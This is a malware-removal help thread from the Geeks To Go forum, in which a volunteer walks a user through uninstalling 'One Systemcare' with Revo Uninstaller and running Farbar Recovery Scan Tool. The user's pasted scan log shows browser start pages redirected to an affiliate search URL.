[moles926]

HI,

Please help to remove One Systemcare from my PC. It appeared on my computer a few days ago and although it does not currently seem to be affecting my computers performance but i figured it is probably malware. I have uninstalled from the control panel but the program is evidently still on my computer. 

Any help greatly appreciated

[Advertisements]

Hello and welcome to Geeks To Go! My nickname is Pystryker , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you

• If you are receiving help for this issue at another forum, please let me know so I can close this thread.
• Please download to and run all requested tools from your Desktop.
• Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
• At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
• If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
• Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
• This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
• Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
• It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
• If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
• If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
• Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
• Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
• Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way.

Now, let's get started, shall we?


Hello, let's use Revo Uninstaller to completely uninstall it, and then we'll get a look at your system and see what remains to be taken care of.


Step 1: Revo Uninstaller

• Please download and install Revo Uninstaller Free
• Double click Revo Uninstaller to run it.
• From the list of programs double click on One Systemcare
• NOTE: If One SystemCare doesn't appear in the list of programs, please skip this step and proceed to Step 2 If it is in the list, please continue.
• When prompted if you want to uninstall click Yes.
• Be sure the Moderate option is selected then click Next.
• The program will run, If prompted again click Yes
• When the built-in uninstaller is finished click on Next.
• Once the program has searched for leftovers click Next.
• Check/tick the bolded items only on the list then click Delete
• When prompted click on Yes and then on next.
• Put a check on any folders that are found and select delete
• When prompted select yes then on next
• Once done click Finish.

Step 2: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
• Place a check in the box marked Addition.txt
  
  
• Press the Scan button.
• It will produce a log called FRST.txt in the same directory the tool is run from.
• Please copy and paste log back here.
• The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Please let me know if Revo uninstalled the program.

FRST Log

Addition.txt Log

[pystryker]

Hello and welcome to Geeks To Go! My nickname is Pystryker , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you

• If you are receiving help for this issue at another forum, please let me know so I can close this thread.
• Please download to and run all requested tools from your Desktop.
• Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
• At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
• If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
• Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
• This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
• Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
• It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
• If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
• If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
• Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
• Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
• Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way.

Now, let's get started, shall we?


Hello, let's use Revo Uninstaller to completely uninstall it, and then we'll get a look at your system and see what remains to be taken care of.


Step 1: Revo Uninstaller

• Please download and install Revo Uninstaller Free
• Double click Revo Uninstaller to run it.
• From the list of programs double click on One Systemcare
• NOTE: If One SystemCare doesn't appear in the list of programs, please skip this step and proceed to Step 2 If it is in the list, please continue.
• When prompted if you want to uninstall click Yes.
• Be sure the Moderate option is selected then click Next.
• The program will run, If prompted again click Yes
• When the built-in uninstaller is finished click on Next.
• Once the program has searched for leftovers click Next.
• Check/tick the bolded items only on the list then click Delete
• When prompted click on Yes and then on next.
• Put a check on any folders that are found and select delete
• When prompted select yes then on next
• Once done click Finish.

Step 2: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
• Place a check in the box marked Addition.txt
  
  
• Press the Scan button.
• It will produce a log called FRST.txt in the same directory the tool is run from.
• Please copy and paste log back here.
• The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Please let me know if Revo uninstalled the program.

FRST Log

Addition.txt Log

[moles926]

Ok, thanks. Im pretty sure i have completed all of the above steps. Revo has uninstalled One Systemcare. FRST and Additio log to follow below

[moles926]

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-02-2016

Ran by Molly Poole (administrator) on POOLE-PC (09-02-2016 14:34:08)

Running from D:\Users\Molly Poole\Desktop

Loaded Profiles: Molly Poole (Available Profiles: Molly Poole & Molly)

Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)

Internet Explorer Version 11 (Default browser: Chrome)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\dgnsvc.exe

(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe

() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe

(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe

(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(Intel Corporation) C:\Windows\System32\igfxEM.exe

(Intel Corporation) C:\Windows\System32\igfxHK.exe

() C:\Windows\System32\igfxTray.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE

(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\agent.exe

(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe

() C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE

(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE

(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe

(Farbar) D:\Users\Molly Poole\Desktop\FRST64 (1).exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

 

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8444632 2015-08-04] (Realtek Semiconductor)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2817776 2014-04-11] (Synaptics Incorporated)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60688 2015-11-20] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)

HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [2068856 2011-10-12] (Flexera Software LLC.)

HKLM-x32\...\Run: [Spellex] => C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe [53760 2015-02-12] ()

HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1065968 2015-07-23] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [2068856 2011-10-12] (Flexera Software LLC.)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATINEE.EXE [298560 2013-12-16] (SEIKO EPSON CORPORATION)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

Tcpip\..\Interfaces\{139019A9-051D-4E9B-8DE0-B85849599CA1}: [DhcpNameServer] 192.168.5.253

Tcpip\..\Interfaces\{E290C363-028E-443D-B7BF-CFA28FF92AE5}: [DhcpNameServer] 192.168.0.1

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.co.uk

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/?gws_rd=ssl

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}

SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}

SearchScopes: HKU\S-1-5-21-1343854479-873069186-2863876452-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}

SearchScopes: HKU\S-1-5-21-1343854479-873069186-2863876452-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://uk.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro&p={searchTerms}

BHO: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\dgnriaie_x64.dll [2014-07-12] (Nuance Communications, Inc.)

BHO: Easy Photo Print -> {9421DD08-935F-4701-A9CA-22DF90AC4EA6} -> C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)

BHO-x32: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2016-01-19] (Microsoft Corporation)

BHO-x32: Dragon Web Extension For Internet Explorer -> {609C0837-8DD3-4F9B-AAC5-446F36BC0353} -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\dgnriaie.dll [2014-07-12] (Nuance Communications, Inc.)

BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-17] (Microsoft Corporation)

Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll [2015-07-31] (Seiko Epson Corporation)

Toolbar: HKLM-x32 - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION)

Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2016-01-17] (Microsoft Corporation)

 

FireFox:

========

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)

FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)

FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)

FF Plugin: nuance.com/DgnRia2_x86_64 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\x64\npDgnRia2_x64.dll [2014-07-12] (Nuance Communications, Inc.)

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2016-01-17] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)

FF Plugin-x32: nuance.com/DgnRia2 -> C:\Program Files (x86)\Nuance\NaturallySpeaking13\Program\npDgnRia2.dll [2014-07-12] (Nuance Communications, Inc.)

FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on

FF Extension: E-Web Print - C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on [2015-12-14] [not signed]

 

Chrome: 

=======

CHR HomePage: Default -> hxxps://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro

CHR StartupUrls: Default -> "hxxps://www.google.co.uk/","hxxp://www.uea.ac.uk/is/portal","hxxp://en-gb.facebook.com/"

CHR Profile: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Slides) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-12-14]

CHR Extension: (Google Docs) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-31]

CHR Extension: (Google Drive) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-31]

CHR Extension: (YouTube) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-31]

CHR Extension: (Google Search) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-31]

CHR Extension: (Google Sheets) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-14]

CHR Extension: (Google Docs Offline) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-31]

CHR Extension: (AdBlock) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-02-07]

CHR Extension: (Unlimited Free VPN - Hola) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2016-02-05]

CHR Extension: (Nebula) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlmflgnnmmojlnbmaokpfcjdkhkjbnok [2016-02-01]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-14]

CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2016-01-31]

CHR Extension: (Gmail) - C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-31]

 

==================== Services (Whitelisted) ========================

 
